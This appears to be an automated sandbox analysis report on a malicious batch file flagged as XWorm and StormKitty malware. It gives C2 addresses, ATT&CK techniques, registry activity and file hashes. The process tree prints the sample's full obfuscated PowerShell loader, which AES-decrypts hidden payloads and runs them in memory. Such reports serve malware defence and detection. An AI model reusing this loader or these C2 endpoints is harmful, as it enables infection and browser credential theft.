stormkitty | 9eb51151389425c487c68c0f293d80fe0c8f894aedcf797fbc37e8bdf4cf1ecf

Analysis

max time kernel
596s
max time network
1139s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
15-09-2024 02:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tre.bat
Size

186KB
MD5

49a0a6fd50d78530a1d0165530bbf452
SHA1

d7c0a6fda37c34e19da741946624e33632372f01
SHA256

9eb51151389425c487c68c0f293d80fe0c8f894aedcf797fbc37e8bdf4cf1ecf
SHA512

1e64aa6cc815dbc537164dec8ef885bdee00e6a02836065c0dadbb440737eb9a1ec361aa6cd9c3c6d8e545a817c554b76b132fd81d4c24089208e8b5c7be1dc1
SSDEEP

3072:Y3QUaDntxn+cceixWDdNllmYtUA8HnUe/EEQjnj/2+AZ8E9zl7LWe9hCWANSblHO:IQt+wixAjSYjcEE6j/2+A+2zl7aemM1O

Score

10^/10

stormkitty xworm credential_access discovery execution rat stealer trojan

Malware Config

Extracted

Family

xworm

147.185.221.16:40164

147.185.221.20:40164

Attributes

install_file
tmp.exe

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/memory/2416-17-0x0000022DE1CB0000-0x0000022DE1CC8000-memory.dmp	family_xworm
behavioral2/files/0x0003000000000705-78.dat	family_xworm

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral2/memory/2416-26-0x0000022DE2790000-0x0000022DE28AE000-memory.dmp	family_stormkitty

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 5 IoCs

flow	pid	Process
17	2416	powershell.exe
36	2416	powershell.exe
39	2416	powershell.exe
40	2416	powershell.exe
51	2416	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2416	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3388	Fllenares C# Crypter.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	ip-api.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Fllenares C# Crypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3568	timeout.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Fllenares C# Crypter.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	Fllenares C# Crypter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Fllenares C# Crypter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	Fllenares C# Crypter.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	Fllenares C# Crypter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Fllenares C# Crypter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0 = 780031000000000002597d631100557365727300640009000400efbe874f77482f5980102e000000c70500000000010000000000000000003a000000000048c5c90055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000	Fllenares C# Crypter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0 = 500031000000000002595369100041646d696e003c0009000400efbe02597d632f5980102e00000066e10100000001000000000000000000000000000000f1272a01410064006d0069006e00000014000000	Fllenares C# Crypter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\MRUListEx = 00000000ffffffff	Fllenares C# Crypter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Fllenares C# Crypter.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	Fllenares C# Crypter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	Fllenares C# Crypter.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Fllenares C# Crypter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	Fllenares C# Crypter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	Fllenares C# Crypter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0000000001000000ffffffff	Fllenares C# Crypter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Fllenares C# Crypter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	Fllenares C# Crypter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	Fllenares C# Crypter.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Fllenares C# Crypter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Fllenares C# Crypter.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0	Fllenares C# Crypter.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Fllenares C# Crypter.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0	Fllenares C# Crypter.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	Fllenares C# Crypter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Fllenares C# Crypter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Fllenares C# Crypter.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Fllenares C# Crypter.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	Fllenares C# Crypter.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	Fllenares C# Crypter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Fllenares C# Crypter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	Fllenares C# Crypter.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings	Fllenares C# Crypter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	Fllenares C# Crypter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Fllenares C# Crypter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\MRUListEx = 00000000ffffffff	Fllenares C# Crypter.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	Fllenares C# Crypter.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Fllenares C# Crypter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Fllenares C# Crypter.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	Fllenares C# Crypter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff	Fllenares C# Crypter.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0	Fllenares C# Crypter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\NodeSlot = "2"	Fllenares C# Crypter.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	Fllenares C# Crypter.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Fllenares C# Crypter.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Fllenares C# Crypter.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Fllenares C# Crypter.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	Fllenares C# Crypter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	Fllenares C# Crypter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = 00000000ffffffff	Fllenares C# Crypter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0 = 7e003100000000002f59b51011004465736b746f7000680009000400efbe02597d632f59b5102e00000070e101000000010000000000000000003e00000000007ab19e004400650073006b0074006f007000000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370036003900000016000000	Fllenares C# Crypter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000	Fllenares C# Crypter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	Fllenares C# Crypter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Fllenares C# Crypter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Fllenares C# Crypter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 19002f433a5c000000000000000000000000000000000000000000	Fllenares C# Crypter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\MRUListEx = ffffffff	Fllenares C# Crypter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Fllenares C# Crypter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	Fllenares C# Crypter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Fllenares C# Crypter.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Fllenares C# Crypter.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	Fllenares C# Crypter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Fllenares C# Crypter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Fllenares C# Crypter.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3388	Fllenares C# Crypter.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2416	powershell.exe
Token: SeDebugPrivilege	2416	powershell.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2416	powershell.exe
3388	Fllenares C# Crypter.exe
3388	Fllenares C# Crypter.exe
3388	Fllenares C# Crypter.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 4084 wrote to memory of 2020	4084	cmd.exe	89
PID 4084 wrote to memory of 2020	4084	cmd.exe	89
PID 4084 wrote to memory of 2416	4084	cmd.exe	90
PID 4084 wrote to memory of 2416	4084	cmd.exe	90
PID 3388 wrote to memory of 1356	3388	Fllenares C# Crypter.exe	105
PID 3388 wrote to memory of 1356	3388	Fllenares C# Crypter.exe	105
PID 3388 wrote to memory of 1356	3388	Fllenares C# Crypter.exe	105
PID 1356 wrote to memory of 2028	1356	csc.exe	107
PID 1356 wrote to memory of 2028	1356	csc.exe	107
PID 1356 wrote to memory of 2028	1356	csc.exe	107
PID 2416 wrote to memory of 4684	2416	powershell.exe	109
PID 2416 wrote to memory of 4684	2416	powershell.exe	109
PID 4684 wrote to memory of 3568	4684	cmd.exe	111
PID 4684 wrote to memory of 3568	4684	cmd.exe	111

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tre.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EZjs3O/YrRsf+LkoNU2BNTXusVrRTrhZDt/IW5OIKd8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0QizlgZdzVSwDxP7nx/ZUg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $TsyGO=New-Object System.IO.MemoryStream(,$param_var); $VvkGv=New-Object System.IO.MemoryStream; $KtTST=New-Object System.IO.Compression.GZipStream($TsyGO, [IO.Compression.CompressionMode]::Decompress); $KtTST.CopyTo($VvkGv); $KtTST.Dispose(); $TsyGO.Dispose(); $VvkGv.Dispose(); $VvkGv.ToArray();}function execute_function($param_var,$param2_var){ $XLGwI=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qkGHc=$XLGwI.EntryPoint; $qkGHc.Invoke($null, $param2_var);}$kzNdt = 'C:\Users\Admin\AppData\Local\Temp\tre.bat';$host.UI.RawUI.WindowTitle = $kzNdt;$LidIz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($kzNdt).Split([Environment]::NewLine);foreach ($BOGXT in $LidIz) { if ($BOGXT.StartsWith('IKSBZaKgyIgKWkvfRYxG')) { $WxcLQ=$BOGXT.Substring(20); break; }}$payloads_var=[string[]]$WxcLQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
  2⤵
  PID:2020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp2588.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4684
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:3568

C:\Users\Admin\Desktop\Fllenares C# Crypter.exe
"C:\Users\Admin\Desktop\Fllenares C# Crypter.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3388
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ro5ia4sg\ro5ia4sg.cmdline"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1356
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBC03.tmp" "c:\Users\Admin\Desktop\CSC7F1A0E5125444D28738909F8D512B42.TMP"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2028

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Discovery

Browser Information Discovery

T1217

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESBC03.tmp

Filesize
1KB

MD5
551ab8988cec9d2d3608e137e0b9e0fc

SHA1
569c940e5e8cedc8334d8328a20d2278fe592316

SHA256
67a11ed6fa16b829fdc9f58bb44763606d815b072fb155910f6f40ed3c66d1c0

SHA512
78310d6c81de009dcd24cd06d78d4f1081aa99c7203d6a7a4f2db20fc37dbdf27fb61e3aad1cbc23d0630cd850c8f14ad71e7a5a1027327087c0f39eaf7165d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wgk41df5.ytd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp2588.tmp.bat

Filesize
171B

MD5
89f1636ab66acd965aacbcde62204dfd

SHA1
71480a270a20ea3da0c1f314db23d915cbc361ed

SHA256
b9790a32f38e2cea4ccb8771e036d781b0823619119dda12d56c6d35fb6e33a0

SHA512
3dcc54611b54cc9dd57e87087c7af93ed8758880fbcdb5e6dfb5a48046695b96a4f842697f6ed4335b35e7f62a8ebd4dba7002c207bed7d4e0c6921c33673218

Download Submit
C:\Users\Admin\Desktop\Code.txt

Filesize
94KB

MD5
31db1b4fa11ddeea13ab3e3e5936cc77

SHA1
0c4cae1357309458a71213648130223af2e49ec6

SHA256
81811088fd52aeffd900a20267d87822ec3aad416a0036c5c7a30651394b990b

SHA512
3f584eb56842ccdb284aba00bcd67eb96186ff1c68e416e8746a00981ee7c298ba7bf5ed62acecd6cfc4357b408b3ee02fdb614dc68ded7ed63c670f66cd995e

Download Submit
C:\Users\Admin\Desktop\Crypted.exe

Filesize
190KB

MD5
dce996b10f35fd4a6cee7687a3b34471

SHA1
cd7a8f3f21d8069a23b0af5d361b4535b516030e

SHA256
609ea06aa2fce3e8d3896447f91a60eb26b3f4d23e2ba777687a60a92a93696d

SHA512
b3340d74db93fe665d217af985c07fd9868ac9fee4c95c0ebf92936f783d946e39fb99271b93d72395f4a312b47c626964b49c92a95d65fc663bfe884d697d02

Download Submit
C:\Users\Admin\Desktop\Fllenares C# Crypter.exe

Filesize
1.1MB

MD5
b05ac29bf3d5d2d0dbfdfe116ed27242

SHA1
0c1b03ac0210980b819ebd1ef061e04b22bcf40b

SHA256
ed383c09c674efae333d6782ecfa73db943353cb6745930cfe57d80733c760a4

SHA512
ca0ab2352c485679edf53a61c62ccc39ec00e7a41fd3f3098fd678b36d9f459333e25ae2f227c419c3938e9bc44a20e43ecd32cbab08ee38f568cc5336f52c90

Download Submit
C:\Users\Admin\Desktop\ftgwc.exe

Filesize
69KB

MD5
e1fd0338cf1cf299468d6949f2dfe55b

SHA1
a6d5bca021c9a3ec19516cd27eb52a7d3b63d548

SHA256
e4f43f2ec13419bee814b1c2fd059909b4d69bd3701ecafba5732620700d41c9

SHA512
60614160c77053803c2e007502af7e1f8ce82b7f7c68dbf4ead3af4c35619b6139c6b5e74b6516bb7bf14250e0603adb7e7f716d660147d9fce32039ce7bb8ba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ro5ia4sg\ro5ia4sg.0.cs

Filesize
94KB

MD5
672c2975b91513c4f2c97e55bc0ef37b

SHA1
70d4de55012ad3e68696bb1d79ff240c38b0378c

SHA256
472d4b535e3f8b4617ca6b0cfd383069df178ce379b7bfebd7be215503779396

SHA512
1f171a5284b904316881a64ff5215a699ab4c6527be23f187c1d2c26e4516b9695ccf818b4e4ece1f99429bb25175c574be28fcb335b3f48415b5293ac88f1bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ro5ia4sg\ro5ia4sg.cmdline

Filesize
255B

MD5
de12ff1207f2ab492921589c3ff482ac

SHA1
931abd64dd0e71c6e9602065f67f9d43be42003f

SHA256
9dd4daadfce47369a1c02f4ee95962fa17c6f4815577fe5b717316855d8ec2c2

SHA512
